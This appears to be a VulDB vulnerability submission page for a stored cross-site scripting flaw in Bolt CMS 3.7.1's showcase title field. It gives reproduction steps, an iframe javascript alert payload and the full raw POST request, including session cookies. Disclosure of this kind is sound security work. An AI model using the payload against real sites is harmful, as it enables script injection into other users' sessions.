Submit #391530: Bolt CMS 3.7.1 Improper Neutralization of Alternate XSS Syntaxinfo

Title	Bolt CMS 3.7.1 Improper Neutralization of Alternate XSS Syntax
Description	Bolt CMS 3.7.1 allows an authenticated user to insert an XSS script in the Title field, when accessing the showcase page in question, XSS occurs 1. Once logged in go to showcases > New showcase 2. set Payload <iframe src="javascript:alert(`Hi :) `)"> in title input 3. After save, access http://192.168.20.40/showcase/xss Poc POST /bolt/editcontent/showcases/1 HTTP/1.1 Host: http://192.168.20.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1134 Origin: http://192.168.20.40 Connection: close Referer: http://10.10.122.116:8000/bolt/editcontent/showcases/1 Cookie: bolt_session_767077c1a5ffbbd8196c82f211235a92=7a832e152ed2e2ee0e7c6259f6; bolt_authtoken_767077c1a5ffbbd8196c82f211235a92=6e890d4f85a4c7c5cb0cf6f1a50883d40ffca79ffdd066adf65ebad7307d2af3 content_edit%5B_token%5D=3RgERLUxl5omlKW6HnG9C9Af15NSHO8Og9-LOqJR9Yg&editreferrer=&contenttype=showcases&title=%3Ciframe+src%3D%22javascript%3Aalert(%60Hi+%3A)+%60)%22%3E&slug=xss&html=&textarea=&markdown=&geolocation%5Baddress%5D=&geolocation%5Blatitude%5D=&geolocation%5Blongitude%5D=&geolocation%5Bformatted_address%5D=&embed%5Burl%5D=&embed%5Bwidth%5D=&embed%5Bheight%5D=&embed%5Bprovider_name%5D=&embed%5Bauthor_name%5D=&embed%5Bauthor_url%5D=&embed%5Bhtml%5D=&embed%5Bthumbnail%5D=&video%5Burl%5D=&video%5Bwidth%5D=&video%5Bheight%5D=&video%5Btitle%5D=&video%5Bauthorname%5D=&video%5Bratio%5D=&video%5Bauthorurl%5D=&video%5Bhtml%5D=&video%5Bthumbnail%5D=&image%5Bfile%5D=&image%5Btitle%5D=&imagelist=%5B%5D&file=&filelist=%5B%5D&datetime=2000-01-01+00%3A00%3A00&date=2024-07-01&integerfield=0&floatfield=0&selectfield=&selectentry=&repeater%5B%5D=&repeater%5B0%5D%5Brepeattitle%5D=&repeater%5B0%5D%5Brepeatimage%5D%5Bfile%5D=&repeater%5B0%5D%5Brepeatcontent%5D=&relation%5Bentries%5D%5B%5D=&id=1&status=published&datepublish=2024-08-15+00%3A05%3A00&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=undefined
User	Dhimitri (UID 45045)
Submission	08/15/2024 02:31 (2 years ago)
Moderation	08/19/2024 15:34 (5 days later)
Status	Duplicate
VulDB entry	273168 [Bolt CMS 3.7.1 Showcase Creation showcases title/textarea cross site scripting]
Points	0

◂ Previous Overview Next ▸

Interested in the pricing of exploits?

See the underground prices here!